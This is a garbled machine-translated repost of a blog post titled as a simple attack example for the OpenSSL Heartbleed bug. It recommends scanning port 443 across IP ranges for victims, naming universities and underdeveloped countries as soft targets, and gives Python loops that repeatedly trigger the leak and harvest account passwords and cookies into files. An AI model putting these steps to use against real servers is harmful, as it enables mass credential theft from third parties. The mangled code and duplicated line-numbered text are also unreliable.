OpenSSL Heartbleed "Heart Bleed" vulnerability simple attack example

Transferred from: http://www.lijiejie.com/openssl-heartbleed-attack/

　　

The openness and prevalence of the OpenSSL Heartbleed vulnerability has excited a lot of people and made others panic.  From the point of view of attack, I already know that the online scanning tools are: 1. Nmap Script SSL-HEARTBLEED.NSE:HTTP://NMAP.ORG/NSEDOC/SCRIPTS/SSL-HEARTBLEED.HTMLNMAP-SV--script=ssl-heartbleed < TARGET&GT;1NMAP-SV--script=ssl-heartbleed <target>2. Jared Stafford's testssl.py:https://gist.github.com/sh1n0b1/101003943. csheartbleedscanner:http://www.crowdstrike.com/community-tools/If you want to search for an attack target in bulk, you can scan the 443 port of the target IP segment directly. Universities and the underdeveloped countries of the Internet are more prone to attack. Get the active host IP address, and then import the scanner. For a specific attack target, you can view what has been read, and use regular expressions to keep pulling the account password. Can also be based on key words, keep catching cookies, accounts and so on. Modify the testssl.py code to not output offset address and non-ASCII characters, find the Hexdump function, modify to: Def hexdump (s): Pdat = ' for B in xrange (0, Len (s), +): l in = [C to C in S[b:b +]] pdat + = '. Join (c if <= Ord (c) <= 126 else '. ') For C in Lin) print '%s '% (Pdat.replace (' ... '),) Print12345678def Hexdump (s): Pdat = ' for B in Xrang  E (0, Len (s), +): Lin = [C for C in S[b:b +]] pdat + = '. Join (c if <= Ord (c) <= 126 Else '. ) for C in Lin) print '%s '% (Pdat.replace (' ... '),) print this will only output a useful ASCII string. 1. Regular expression Grab account import Osimport reimport timeaccounts = []while True:result = Os.popen (' openssl.py '). Read () matches = R E.findall (' "DB": "(. *?)", "Login": "(. *?)", "Password": "(. *?)" ', result) for match in Matches:if match not in Accou Nts:accounts.append (Match) with open (' Accounts.txt ', ' a ') as InFile:inFile.write (St R (Match) + ' \ n ') print ' New account: ', Match time.sleep (1.0) 123456789101112131415import Osimport reimport ti Me accounts = []while True:result = Os.popen (' openssl.py '). Read () matches = Re.findall (' "DB": "(. *?)", "Login": "(. *? "," Password ":" (. *?) "', result) for match in Matches:if match not in Accounts:accounts.append (match ) with open (' Accounts.txt ', ' a ') as InFile:inFile.write (str (match) + ' \ n ') print ' Ne W account: ', Match time.sleep (1.0) The script interval reads the data once a second, and finds the regular matching password, if it didn't appear beforeWrite the Accounts.txt file. This avoids repeatedly writing the same account and password. 2. According to the key words to catch the data if you are not sure of the background address, do not know the login request, the format of the cookie, directly with the key words to grasp the account on the line. Similar to the following code: Import osimport reimport timeaccounts = []while True:result = Os.popen (' openssl.py '). Read () keywords = [' s Ystem ', ' Password ', ' passwd ', ' admin '] for word in keywords:if result.find (word) > 0:print ' new                Data ', Time.asctime () with open (' data_1\\ ' + time.asctime (). Replace (': ', ') + '. txt ', ' W ') as F: F.write (Result) break Time.sleep (1.0) Import Osimport reimport time accounts = []while True:result = O S.popen (' openssl.py '). Read () keywords = [' system ', ' password ', ' passwd ', ' admin '] for word in keywords:if R Esult.find (Word) > 0:print ' new Data ', Time.asctime () with open (' data_1\\ ' + time.asctime (). repl Ace (': ', ') + '. txt ', ' W ') as F:f.write (result) break Time.sleep (1.0) so that once the returned data has a keyword passwd , password, etc., the data will be written to the Data_1 folder under the name of the time.

　　

OpenSSL Heartbleed "Heart Bleed" vulnerability simple attack example